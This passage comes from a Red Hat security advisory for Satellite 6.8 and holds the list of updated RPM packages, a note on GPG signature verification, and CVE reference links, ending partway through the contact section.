6.3-1.el7ar.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nrubygem-rack-1.6.12-1.el7sat.noarch.rpm\nrubygem-rake-0.9.2.2-41.el7sat.noarch.rpm\nsatellite-6.8.0-1.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-cli-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.noarch.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.noarch.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.noarch.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.noarch.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.noarch.rpm\ntfm-rubygem-audited-4.9.0-3.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.noarch.rpm\ntfm-rubygem-builder-3.2.4-1.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-coffee-rails-5.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-coffee-script-2.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-coffee-script-source-1.12.2-4.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-connection_pool-2.2.2-2.el7sat.noarch.rpm\ntfm-rubygem-crass-1.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-css_parser-1.4.7-3.el7sat.noarch.rpm\ntfm-rubygem-daemons-1.2.3-7.el7sat.noarch.rpm\ntfm-rubygem-deacon-1.0.0-4.el7sat.noarch.rpm\ntfm-rubygem-declarative-0.0.10-1.el7sat.noarch.rpm\ntfm-rubygem-declarative-option-0.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-deep_cloneable-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-deface-1.5.3-2.el7sat.noarch.rpm\ntfm-rubygem-diffy-3.0.1-6.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-erubi-1.9.0-1.el7sat.noarch.rpm\ntfm-rubygem-excon-0.58.0-3.el7sat.noarch.rpm\ntfm-rubygem-execjs-2.7.0-4.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\ntfm-rubygem-fast_gettext-1.4.1-3.el7sat.noarch.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.noarch.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.noarch.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.noarch.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-cockpit-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.noarch.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.noarch.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.noarch.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.noarch.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.noarch.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.noarch.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.noarch.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.noarch.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.noarch.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.noarch.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.noarch.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.noarch.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.noarch.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.noarch.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.noarch.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.noarch.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.noarch.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.noarch.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.noarch.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.noarch.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_passenger-4.0.18-24.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\npython3-aiohttp-3.6.2-4.el7ar.x86_64.rpm\npython3-multidict-4.7.4-2.el7ar.x86_64.rpm\npython3-yarl-1.4.2-2.el7ar.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm\nrubygem-facter-2.4.1-2.el7sat.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nrubygem-passenger-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-3258\nhttps://access.redhat.com/security/cve/CVE-2018-11751\nhttps://access.redhat.com/security/cve/CVE-2019-12781\nhttps://access.redhat.com/security/cve/CVE-2019-16782\nhttps://access.redhat.com/security/cve/CVE-2020-5216\nhttps://access.redhat.com/security/cve/CVE-2020-5217\nhttps://access.redhat.com/security/cve/CVE-2020-5267\nhttps://access.redhat.com/security/cve/CVE-2020-7238\nhttps://access.redhat.com/security/cve/CVE-2020-7663\nhttps://access.redhat.com/security/cve/CVE-2020-7942\nhttps://access.redhat.com/security/cve/CVE-2020-7943\nhttps://access.redhat.com/security/cve/CVE-2020-8161\nhttps://access.redhat.com/security/cve/CVE-2020-8184\nhttps://access.redhat.com/security/cve/CVE-2020-8840\nhttps://access.redhat.com/security/cve/CVE-2020-9546\nhttps://access.redhat.com/security/cve/CVE-2020-9547\nhttps://access.redhat.com/security/cve/CVE-2020-9548\nhttps://access.redhat.com/security/cve/CVE-2020-10693\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11619\nhttps://access.redhat.com/security/cve/CVE-2020-14061\nhttps://access.redhat.com/security/cve/CVE-2020-14062\nhttps://access.redhat.com/security/cve/CVE-2020-14195\nhttps://access.redhat.com/security/cve/CVE-2020-14334\nhttps://access.redhat.com/security/cve/CVE-2020-14380\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at 